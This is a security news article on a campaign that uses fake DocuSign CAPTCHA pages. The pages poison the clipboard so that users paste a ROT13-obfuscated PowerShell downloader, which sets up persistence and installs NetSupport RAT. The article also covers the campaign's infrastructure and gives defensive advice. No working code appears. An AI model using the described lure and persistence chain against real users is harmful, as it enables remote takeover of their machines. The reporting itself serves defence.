- "도난 시도만 3억 달러 이상"··· AI 기반 '벤더 이메일 손상 공격'에 주목할 이유
- Cyber as a Pressure Valve: Why Economic Conflict Is Fueling a New Era of Cyber Escalation
- “2025년 스테이블코인 투자 2024년 대비 10배 예상”···CB인사이츠, ‘스테이블코인 시장 지도’ 공개
- The best portable power stations for camping in 2025: Expert tested and reviewed
- "제조 업계, 스마트 기술 전환 중··· 95%가 AI 투자 예정" 로크웰 오토메이션
Fake Docusign Pages Deliver Multi-Stage NetSupport RAT Malware
A new malware campaign using fake DocuSign verification pages to deploy the NetSupport Remote Access Trojan (RAT) has been uncovered.
According to DomainTools, the campaign tricks users into infecting their own machines through a series of deceptive steps involving clipboard manipulation and disguised scripts.
At the core of the campaign is a spoofed DocuSign website that mimics a CAPTCHA verification screen. Users are prompted to check a box that triggers clipboard poisoning. A malicious PowerShell script is copied to the user’s clipboard, with instructions to paste and run it via the Windows Run prompt.
Once executed, the script downloads a second-stage payload, which sets up persistence on the victim’s machine. This involves downloading an executable from GitHub and placing a shortcut in the Startup folder.
The final stage delivers NetSupport RAT, allowing the attacker to maintain remote access.
The initial script and site obfuscate their intent using ROT13 encoding and blend Cloudflare and DocuSign branding to appear legitimate.
Meanwhile, the attack’s architecture uses multiple steps to bypass security defenses, each script acting as a downloader for the next.
Expanding Infrastructure and Spoofed Platforms
The DomainTools investigation also revealed a broader infrastructure supporting this campaign. Domains mimicking Gitcodes, Okta and popular media apps like Netflix and Spotify were identified.
The same techniques, CAPTCHA spoofing, script chaining and clipboard attacks, were found across these platforms.
Several domains shared common traits, including:
-
Registration via Cloudflare, NameCheap and NameSilo
-
Name servers linked to cloudflare[.]com and luxhost[.]org
-
SSL certificates issued by WE1
-
Malware hosted on GitHub and Discord content delivery networks
Despite the sophistication of the attack, the tools used are familiar.
These include NetSupport Manager, a legitimate remote administration tool, which is frequently repurposed in cyber-attacks. Similar techniques have been used by groups such as FIN7 and STORM-0408, though attribution remains unclear.
Security Recommendations and Takeaways
DomainTools urged users to stay alert, especially when prompted to run PowerShell scripts by unfamiliar websites. No legitimate site should ask users to paste commands into the Windows Run prompt under the pretense of verification. CAPTCHA pages that trigger script execution are also a clear warning sign.
Users should closely inspect URLs and SSL certificates, watching for subtle misspellings, strange domain extensions or unrecognized certificate issuers. These are often signs of spoofed websites.
Ultimately, DomainTools emphasized that these attacks rely more on user deception than technical flaws. Staying skeptical and verifying legitimacy before acting remains one of the strongest defenses.
Image credit: Tada Images / Shutterstock.com
